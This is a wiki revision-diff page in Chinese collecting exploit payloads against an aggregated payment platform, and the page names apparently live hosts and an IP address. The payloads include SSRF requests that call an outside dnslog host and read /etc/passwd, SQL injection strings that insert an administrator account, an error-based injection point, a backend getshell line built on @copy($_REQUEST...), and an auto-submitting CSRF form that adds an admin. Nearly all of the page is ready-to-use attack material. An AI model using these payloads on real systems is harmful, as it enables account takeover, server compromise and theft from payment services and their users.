Difference between revisions of "全版本聚合支付漏洞"
| Line 1: | Line 1: | ||
{| style="margin: auto; width: 750px;" | {| style="margin: auto; width: 750px;" | ||
| style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | | | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | | ||
| − | {| cellspacing="2px" | + | {| cellspacing="2px" |
| valign="middle" | [[Image:Warn1.png|50px]] | | valign="middle" | [[Image:Warn1.png|50px]] | ||
| 這個頁面存在爭議,因此頁面內容存在不確定性。</span> | | 這個頁面存在爭議,因此頁面內容存在不確定性。</span> | ||
| Line 9: | Line 9: | ||
==Vul== | ==Vul== | ||
| − | |||
http://47.104.233.93/Payment_Index_batchQuery | http://47.104.233.93/Payment_Index_batchQuery | ||
| − | |||
==SSRF== | ==SSRF== | ||
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 | http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 | ||
| Line 35: | Line 33: | ||
| − | == | + | ==SQL注入(需要代理賬戶)== |
| − | |||
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry | index.php?m=user&c=IntoPieces&a=ajaxGetIndustry | ||
DATA: | DATA: | ||
| Line 44: | Line 41: | ||
http://vip.qhkjpay.cn/conn.php | http://vip.qhkjpay.cn/conn.php | ||
| − | |||
| Line 56: | Line 52: | ||
==后台Getshell== | ==后台Getshell== | ||
| − | manage_System_base.html | + | manage_System_base.html |
',@copy($_REQUEST[x],$_REQUEST[c]),// | ',@copy($_REQUEST[x],$_REQUEST[c]),// | ||
| Line 69: | Line 65: | ||
==CSRF添加管理員== | ==CSRF添加管理員== | ||
| − | <code> | + | <code> |
<html lang="en"> <br> | <html lang="en"> <br> | ||
<body onload="document.forms[0].submit();"> <br> | <body onload="document.forms[0].submit();"> <br> | ||
| − | <form | + | <form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post"> <br> |
<input type="hidden" name="username" value="ok179"> <br> | <input type="hidden" name="username" value="ok179"> <br> | ||
<input type="hidden" name="password" value="test123"> <br> | <input type="hidden" name="password" value="test123"> <br> | ||
| Line 78: | Line 74: | ||
<input type="hidden" name="groupid" value="1"> <br> | <input type="hidden" name="groupid" value="1"> <br> | ||
</body> <br> | </body> <br> | ||
| − | </html> | + | </html> |
</code> | </code> | ||
Revision as of 17:12, 28 February 2021
|
SSRF
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 o7xva.l.dnslog.io/`file`
file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini
SQL注入添加管理員用戶
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
SQL注入(需要代理賬戶)
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry DATA: id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
insert into pay_admin (`id`,`username`,`password`,`groupid`) values ('101','ok','7aa5e695be95cdd64a88410a64dfe2c1','1');--+
http://vip.qhkjpay.cn/conn.php
SQL注入(payload和上面相同)
index.php?m=user&c=api&a=ajaxGetIndustry
后台Getshell
manage_System_base.html ',@copy($_REQUEST[x],$_REQUEST[c]),//
SQL報錯注入(API支付)
Pay_Pay_getSignkey?code=123*&merid=222
CSRF添加管理員
<html lang="en">
<body onload="document.forms[0].submit();">
<form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post">
<input type="hidden" name="username" value="ok179">
<input type="hidden" name="password" value="test123">
<input type="hidden" name="reppassword" value="test123">
<input type="hidden" name="groupid" value="1">
</body>
</html>